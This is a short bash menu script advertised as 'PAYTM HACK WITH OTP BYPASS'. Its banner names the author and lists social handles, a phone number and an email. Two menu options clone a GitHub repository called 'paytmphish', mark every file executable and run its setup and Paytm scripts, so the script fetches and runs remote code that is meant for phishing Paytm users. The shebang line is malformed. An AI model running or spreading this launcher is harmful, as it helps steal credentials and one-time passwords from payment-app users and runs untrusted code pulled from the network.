#usr/bin/bash
clear
bi='\033[34;1m' #biru
i='\033[32;1m' #ijo
pur='\033[35;1m' #purple
cy='\033[36;1m' #cyan
me='\033[31;1m' #merah
pu='\033[37;1m' #putih
ku='\033[33;1m' #kuning
# Jangan Recode Ya gayn
echo
echo
echo
echo $i"["$bi"•"$i"]"$me"──────────────────────────────────"$i"["$bi"•"$i"]"
echo $i" |"$cy"        PAYTM HACK WITH OTP BYPASS    "$i"             |"
echo $i" |"$me"=========================================="$i"|"
echo $i" |"$pu" AUTHOR :"$ku"   KHOKAN DAS [MR HACKER]"$i"        |"
echo $i" |"$pu" FACEBOOK :"$ku"  KHOKAN DAS"$i"                   |"
echo $i" |"$pu" INSTAGRAM  :"$cy"Impish_khoka"$i"                 |"
echo $i" |"$pu" Contact  WhatsApp :"$ku" 918906791455"$i"         |"
echo $i" |"$pu" Contact Gmail :"$ku"    khoka.kd@gmail.com"$i"    |"
echo $i"["$bi"•"$i"]"$me"──────────────────────────────────"$i"["$bi"•"$i"]"
echo $i" |"$me"        PLEASE SUBSCRIBE MR HACKER        "$i" |"
echo
echo $i"|"$me" 1"$i" |"$cy"  PAYTM HACK SETUP   "$i"|"$i"    |"$cy" M"$i" |"
echo $i"|"$me" 2"$i" |"$cy"   PAYTM  HACKING    "$i"|"$i"    |"$cy" R"$i" |"
echo $i"────────────────────────────────    ─────"
echo $i"|"$me" X"$i" |"$cy"     EXIT    PROGRAM      "$i"|"$i" 
echo $i ───────────────────────────────      ─────"
echo
echo $me"┌==="$bi"["$i"MR HACKER"$bi"]"$me"======"$bi"["$i""Support me""$bi"]"
echo $me"¦"
read -p"└──# " pil

if [ $pil = 1 ]
then
clear
figlet -f slant "W A I T"|lolcat
sleep 1
git clone https://github.com/MrHackerOfficial/paytmphish
cd paytmphish
chmod +x *
./setup.sh
fi

if [ $pil = 2 ]
then
clear
figlet -f slant "W A I T"|lolcat
sleep 1
git clone https://github.com/MrHackerOfficial/paytmphish
cd paytmphish
chmod +x *
./setup.sh
./Paytm.sh
fi

if [ $pil = X ]
then
clear
figlet -f slant "E X I T"|lolcat
sleep 2
echo $cy"THANKS FOR USEING"
sleep 2
echo $i"join Telegram :- MrHacker for New script "
sleep 2
echo $ku"WhatsApp :"$i" 918906791455"
echo $ku"Instagram :"$i" Impish_khoka"
sleep 2
echo $pur">> Thanks  &  Support me <<"
exit
fi